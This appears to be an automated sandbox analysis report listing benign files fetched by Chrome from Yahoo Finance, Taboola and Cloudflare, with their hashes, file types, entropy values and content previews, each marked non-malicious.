                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2145)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2173
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2369641537402165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:ezJHaFBhh6ZcB1deYarBhh6OlRwQh6I9RlrN0fv5lhDRaDWurj76y5HnlAbrHnV:ezJyPGs1delPbXR6FDRaDWAj76ytnli
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BA1111D37A99BD6CC5055729DEA3C021
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:04F8C51D77BFFE87E58CFDFECD74B3066E2ED9BE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F3D1DADE0DC4DB1241CEC26DEB64CC2BBCD65CA02139E194A74D759F7AD1C138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3AB2E4B0E281F40675032A94F12DD6D6C840253FE1A11049BDCA007D4B16B398D2A777B2338C557317768F3B5D5BAAF4137960194FF51CA9471D5BE2673B9812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/libtrc/google-topics-api.20240929-12-RELEASE.es6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! 20240929-12-RELEASE */..(o=>{const e="top",t="https://cdn.taboola.com",i="http://localhost:9876",n=`${t}/libtrc/static/topics/taboola-browsing-topics.html`,r=`tbl-browsing-topics-iframe-${100*Math.random()}`;function s(){try{if(!TRC.topics)return;c(TRC.topics)}catch(o){__trcWarn(`failed to save handed Google Topics at local storage: ${o.message}`)}}function c(o){try{const t=a()||[];for(let e=0;e<o.length;e++){const i=o[e],n=t.some(o=>o.topic===i.topic);if(!n){const o={topic:i.topic,taxonomy:i.taxonomyVersion,model:i.modelVersion,config:i.configVersion,version:i.version};t.push(o)}}if(!t.length)return;TRC.pageManager.storeValue(e,JSON.stringify(t)),m()}catch(o){__trcWarn(`failed to save Google Topics at local storage: ${o.message}`)}}function a(){let o,t;try{if((t=(o=TRC.pageManager.getValue(e))?JSON.parse(o):null)&&t.length>0){const o=l(t);return o}}catch(o){__trcWarn(`failed to read Google Topics from local storage: ${o.message}`)}}function l(o){let t=!1;return o.forEach((e,i)=>{(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YMj98W:/B8W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:94F3E250EF82EA04F7645C5653F99484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E658EFBCCC394F9F6863C006A466759897810A87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:81848FA922F902C6DC9B95ABC63CF6468C651AEEAD5FFA99D85CEB27EF7773D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:04D53AC8419EA61C356F6B30C950D8FA98BC3A4C03A3611EFB70197512811750EABC71173472F395D91C5B91639130190375585F7ECB9DBAA5863288F9940CA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:dUR8vedpXY3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):149336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.496490218548733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:1SERAbS2HYOmf1uZYB58lwhf+sNdkSWHGcZOqDsAF:1VW7HYOvZA58XMdfWfZCU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8F1C7F5187E8E78FDB31A5E6C688E803
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:64B1EF52851B1C5B130BD7FC12576329D1738F0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0598E13041B04BD01DC5E5849ABEBAC0E253BBAC3EC6BDC71CA62B84100717F4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B5F744E0AF9D4736B542060471404E074FCA5769FFEBEF2BECD0A311329BAE985B97FFB52247E571EE0C2A9B7A99CB3FD5D91F21BD807A09D0A45FB651D12217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/pv/static/misc/voice-close-202105050733.wav:2f81efb76e543b:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFFPG..WAVEfmt ........D... b.... .data.....r.6.>.7..6!'.7...5...7BU...O.7...FE.7D...7Ud...MQ7.;J.7&.7..t.j..6. ....)6m...x..O...?..eH..........7.5....m.........P..........L...%J....9...u,.........H=......H=..j0..>....3...Y.......+..Ud........ ..>..G".M..r.".....!.....s......FE...v......._..~....Pz..L....O.....r.".....k..5......y............5m..?.6.....6&.`.|.$7..-..MQ7.>..{7...._.7....v.7.k.6..7.\.6y..7..7..7$.<7D..7k.j7...7..7...7m.7...8.n.7 ..8...7...8.~.79..8k..7.x.8.1.74i.8...8...84i.8.+.8Q..8...7...8...7...8k..7~..8...7._.8...7...8G..7o..8...7[..8Ud.7C..8.L.7...8..o7.C.7j.E7.>.7A..7H..70F.6.@.7..6j..7BU.5.O.7Ud..m.7..~.. .7.!..>s7.~..~.H7..=.K..7D.e.0F.6......6#R.....5.J......&..............`...w...?0.h8!..".;.O.;i..<7..<+L.<..<.(.<...<...=6#.=..9=.\:=J.T=F.U=.:h=..h=..s=..t=.x=..y=..y=+Rz=Kzw=p.x=\.o=QMp=..d=..d=..\=.e]=..d=.Xe=.Q~=..~=...=.g.="{.=..=..=.#.=N.=.(.=4.=.1.=...=.i.=...={..=p.=.,.=[..=..=.O.=...=.e.=J.=...=...=...=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (1904)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.164653390661849
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Tf7QAaqTV3qjsNVN6Q7F9PoeWjCQ8PeZlvn:TV/xcMNR9POZZlvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F3C6FAA96CF15803D54C2BDC49D5CC59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CAC6824BF3CF20E13357B465FE9D4045D63B0BCE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A74EB356648AB462BA0806A1BA955E7834C6750CE498B650D9F8C4CAFFFEA9E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9962708C72A01389DAB4C77A4EE97A9DB0A7F63B5F3442655304BBD735C4AF91992D2255B1025D01AA5337E2242EB242DFF6CA91993A93A350ED53D0C2062B48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as S,p as h,k as u,n as b,i as d,e as k,b as p,t as v,d as N,f as q,j as D,h as P,q as y,L as o,l as _,m as C,Y as I}from"./scheduler.Dsuh-FKt.js";import{S as g,i as j}from"./index.CvwOawEI.js";function r(n){let e,i,t=(n[0]||"")+"",f,l=!n[3]&&m(n);return{c(){e=k("div"),l&&l.c(),i=p(),f=v(t),this.h()},l(s){e=N(s,"DIV",{class:!0});var a=q(e);l&&l.l(a),i=D(a),f=P(a,t),a.forEach(d),this.h()},h(){y(e,"class","publishing yf-1weyqlp"),o(e,"bolded",n[2])},m(s,a){u(s,e,a),l&&l.m(e,null),_(e,i),_(e,f)},p(s,a){s[3]?l&&(l.d(1),l=null):l?l.p(s,a):(l=m(s),l.c(),l.m(e,i)),a&1&&t!==(t=(s[0]||"")+"")&&C(f,t),a&4&&o(e,"bolded",s[2])},d(s){s&&d(e),l&&l.d()}}}function m(n){let e=(n[1]||"")+"",i,t,f,l=n[1]&&n[0]&&c();return{c(){i=v(e),t=p(),l&&l.c(),f=h()},l(s){i=P(s,e),t=D(s),l&&l.l(s),f=h()},m(s,a){u(s,i,a),u(s,t,a),l&&l.m(s,a),u(s,f,a)},p(s,a){a&2&&e!==(e=(s[1]||"")+"")&&C(i,e),s[1]&&s[0]?l||(l=c(),l.c(),l.m(f.parentNode,f)):l&&(l.d(1),l=null)},d(s){s&&(d(i),d(t),d(f)),l&&l.d(s)}}}function c(n)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (24198)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):27250
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.422166358554103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:j39Vu+xvhAOGtK0oOa7CD+SaRitSCoz+K0Yed+4JrkKstSpgVJmR/6yIhXcR0hz5:BVugW39WhWiyIheH0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:65BEC8558BCBE67D88D6D1233FFC1B14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C1A09B392C56D4DD6A3D057AB9CCC71C2EA8FAFF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:68890E38FCF44FC05032D16F27F314F7C2B49C7E1EDF25D21C8AF58DE39B4BBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:18FEB7C771475FA110FADB7576235CE4B3FFFE358257FA0EDB4A34536664588E7ACB5A0D0784112BB55687451F2A5DF23E307E2F4DDF017116BFECD473AB5CCC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/sf/0.1.487/js/safe.modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! SAFEFRAME 0.1.487 . 2024, Yahoo Inc. All rights reserved. */(()=>{var e={466:e=>{var t;(t=void 0===t?{}:t).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l-9.9 9.9-9.898-9.9c-.78-.78-2.048-.78-2.828 0-.78.78-.78 2.047 0 2.828l9.9 9.9-9.9 9.898c-.78.78-.78 2.047 0 2.828.78.78 2.047.78 2.828 0l9.9-9.9 9.898 9.9c.78.78 2.048.78 2.828 0 .782-.78.782-2.047 0-2.827z"},e.exports&&(e.exports=t.close)},228:e=>{var t;(t=void 0===t?{}:t)["decline-fill"]={name:"decline-fill",height:48,width:48,path:"M24 1C11.3 1 1 11.3 1 24s10.3 23 23 23 23-10.3 23-23S36.7 1 24 1zm9.8 32.8c-.9.9-2.2.9-3.1 0L24 27l-6.8 6.8c-.9.9-2.2.9-3.1 0s-.9-2.2 0-3.1l6.8-6.8-6.7-6.7c-.9-.9-.9-2.2 0-3.1.9-.9 2.2-.9 3.1 0l6.7 6.7 6.7-6.7c.9-.9 2.2-.9 3.1 0 .9.9.9 2.2 0 3.1l-6.7 6.7 6.7 6.8c.9.9.9 2.3 0 3.1z"},e.exports&&(e.exports=t["decline-fill"])},586:(e,t,n)=>{"use strict";var o=n(427),r=n(215),i=n(945);function s(){}function a(e){return e&&"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), CFF, length 58448, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):58448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.996586878132448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:UkDg2Ywutyh7fPqnva9lX9MzIqEcrdVkgIC2SlulNArk/snzi:UwPYRoh7fPAv659GrHmlSUUBi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3C71D2DD717D40FEE3A59365ECA4A591
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:414D6092CADD1E498664FD138C33AA920C5D4999
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:05C5618D231B9BDB0AC571A5AE5AC3C8075732E546550C1AD0426365CD43B854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CEB18E1E3CA74FAC398C5AD7328386061F5E833A199858C576B731A9AE499BFC3D515B796CEE66FD0DB09674EB1604AECDB4DEEC272F6F54BFEBAB702F45827C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/finance/fonts/GT-America-Condensed-Bold.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:wOF2OTTO...P.......................................0..$...*....`..j.6.$.......a. [....*2....?..."%....._@.....f.p.}..T#7].8.."x.......5.D......m....|.....&&.p.R...>p..l.KS.........hS.y..S...Z..S.E.7..{k.o.....]KI%URe..RJ.......*..*........X..s..O9.k.....,"...........i.*...>(M|~Q$af...0.c.....k..ks.iH.P...R.G..+..z;0.z..k.....E..<s..ekWT...^..&.....Iq.....j.9j...c.a..ae.D.)..9?..........boZ.6..3..5?]8..t:..w.........7W.U..M...G?...O....O.(.............g.a!.Sd..c.cU...LI%;.../...........-.C+..{D.]?.*Op.{.g.....P"Z.X.#....?<?.s..a.(.9.+1*.P..=...I~..*...8..QM. u.:.h....Ntnf......&...dR.h#DH.Jc....E...\T...F+i...F.S.."6..X)V....`.x..m...bs6?.N....'..[.....q..p.4.....e..2..r.g.w_5..UF.....BB.....dDw.&.....j~....O..A.....2@=.........d<Z'.....tZ....T..V.l.B.....!.+.J..o.........C.B....+......a.aZZ...q)yi.....o.]..Q..%..R...m...0:rkX.....m,..u..F_.L...J.C...).,.e%.W....Z.......=./...%&........V.m.O4.c..X.(.m;.1Z5df..E.Oq...Vi..y+....!!/!@...TtYn.Lu.\F..(Fq.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (24850)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.116910413083682
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:+O+ngXh3faH86i0BJYCw2M8h0ZR00TBiltM2kHjom:+Ovh3fg80BJMP700TBcH4om
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6281FC8E8ABCB1CF0C0D27AC1908296C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E7218D509EE07278307EEE86CB34F90529BD16E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:06E57D9B9A4B74DDD435E49C6B2C4FD1F29A39535414F7A54CFF1C0CEBE2AD15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3921320F36A3C9777FE7BC77FAB7CF056181283B2BBF03BB1E2104CFE749746A1217DAC11C8016742FFF3AB0296DB23BC773387281596586A1CA0E588A7EE30B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-3e9593a4.2848328177992930197b.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[3888],{2403:(t,e,i)=>{var s=i(4603);(t=>{var e=void 0!==s.mE?s.mE:t.CIQ,i=void 0!==s.vn?s.vn:t.timezoneJS,n=36e5,r=864e5,a=e.Market;e.Market=function(t){this.market_def=!1,this.rules=!1,this.normalHours=[],this.extraHours=[],this.class_name="Market",i.Date?this.tz_lib=i.Date:this.tz_lib=Date,this.market_tz="",this.hour_aligned=!1,this.convertOnDaily=!1,this.enabled_by_default=!1,void 0!==t&&t&&!e.isEmpty(t)?(t.market_definition&&(t=t.market_definition),t.rules&&(this.rules=t.rules),t.market_tz&&(this.market_tz=t.market_tz),t.convertOnDaily&&(this.convertOnDaily=t.convertOnDaily),t.hour_aligned,this.hour_aligned=t.hour_aligned,void 0!==t.beginningDayOfWeek&&(this.beginningDayOfWeek=t.beginningDayOfWeek),void 0!==t.minimum_session_length&&(this.minimumSessionLength=t.minimum_session_length),void
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (30186)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):32700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.489965733482254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:rsHz9jdA0KZbptvzF+D1+anaTNG3Bpqp2pnZNX6pJpvKHi6vp8BMoV3QMg4pd6h5:onKanaiNoVg5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:27E0A461EF1C5281C43AF95F2C333D1A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CB0E02CCAB6E61D7F3178785825F84D34A0A9F16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E0C3F2F92332679D0089AF1E51A84ACED3E0693EE8EA3D88AA041B58870FD951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:779FE22DB90B60E4BBF49306E8ABD12F604081BD4059D8045D47F49907DFFA0A8C4A05E2A8642AD4D322D9A1FE9BC6E78D3D324F547D02EB9892DAF253889499
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/server.CGBHKPKz.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var Ct={},q={};q.byteLength=Lt;q.toByteArray=Mt;q.fromByteArray=Pt;var k=[],R=[],kt=typeof Uint8Array<"u"?Uint8Array:Array,H="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(var D=0,St=H.length;D<St;++D)k[D]=H[D],R[H.charCodeAt(D)]=D;R[45]=62;R[95]=63;function lt(c){var p=c.length;if(p%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var a=c.indexOf("=");a===-1&&(a=p);var w=a===p?0:4-a%4;return[a,w]}function Lt(c){var p=lt(c),a=p[0],w=p[1];return(a+w)*3/4-w}function _t(c,p,a){return(p+a)*3/4-a}function Mt(c){var p,a=lt(c),w=a[0],y=a[1],f=new kt(_t(c,w,y)),h=0,o=y>0?w-4:w,x;for(x=0;x<o;x+=4)p=R[c.charCodeAt(x)]<<18|R[c.charCodeAt(x+1)]<<12|R[c.charCodeAt(x+2)]<<6|R[c.charCodeAt(x+3)],f[h++]=p>>16&255,f[h++]=p>>8&255,f[h++]=p&255;return y===2&&(p=R[c.charCodeAt(x)]<<2|R[c.charCodeAt(x+1)]>>4,f[h++]=p&255),y===1&&(p=R[c.charCodeAt(x)]<<10|R[c.charCodeAt(x+1)]<<4|R[c.charCodeAt(x+2)]>>2,f[h++]=p>>8&255,f[h++]=p&255),f}function Nt(c){return k[c>>18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (45591)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):45639
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.329565888307947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:GDBrGM2jRx2khRbAu+D+Atg8r+AMQJd9hBuLWwIgyIlS+cPD4n2F5Q33RS0m3t:GDlGM2jRxfhaGAtFeQZb+yIluLJi3QHd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:177D755DE6B69409ABFF86651782B3F9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5D8E3582F9B694491C55C8200C8543E4868412F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9DB9A5A8D328C70B53272D4DFF11E298182278108DDA394DABAC4C79410EC279
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4BFED05BCDC17C67ACDFAD78EF83B86DC9A86ABACEFD0A1453359D72735E5A932352E7C790F8B4C01E697295C34C77DC0B91569BAA41B648D96A65FD94711A19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e,t,n,r,o={3880:(e,t,n)=>{n.r(t),n.d(t,{USER_SEGMENT:()=>ft,addPluralRules:()=>_t,attachListener:()=>ct,buildAdminDashboardUrl:()=>Be,checkBrowser:()=>oe,conversationPageBackToCommentsEnabled:()=>We,copyToClipboard:()=>Oe,createEventListenerGroup:()=>ut,dispatchCustomEvent:()=>ge,dispatchEvent:()=>se,dispatchInternalEvent:()=>Xe,dispatchSpotimEvent:()=>me,formatLanguageCode:()=>ee,formatLokaliseLanguageCode:()=>te,formatToLocaleString:()=>$,getActiveElement:()=>wt,getAsyncCallConfigs:()=>Ze,getCloudinaryUrl:()=>Ce,getCurrentScrollPosition:()=>Y,getCustomPublisherData:()=>Ee,getDebugger:()=>ze,getDynamicTranslations:()=>Qe,getLocation:()=>be,getPostId:()=>nt,getSegment:()=>gt,guid:()=>X,initScrollListener:()=>q,isHTMLElement:()=>yt,isIOS:()=>bt,isInIframe:()=>ce,isInSafeframe:()=>U,isMobileDevice:()=>et,isOldBrowser:()=>ue,isUnsupportedBrowser:()=>ie,isWebpSupported:()=>Le,isWebpSupportedAsync:()=>ke,listenOnce:()=>st,loadJSFile:()=>lt,navigate:()=>Pe,navigateSafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2074), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.260719431857589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:CEUG4rNVxugJTY7rRKLNqpH7q7HwDOq7br2yOuQ6qh:CdrNV0gVWvbq7eOq72yOdh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:93D5BB91C9A48C4EDBC164A65354B00C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA8D8A5F20B4061A7581135B465F7D81F431390C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E17075CF2F747253CB3C737891BE0F417B8F4330DDAB9D53013BDD4EBCA568EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3F0F5D520F75A443304ED277F73F050698029942A1A01B9B65A8F0D38846B7DFA04D126685A75436BC3534D94DD0C9B1BCCC6DB2C628C58FF74453FA92FD9D22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/scripts/ifs.js
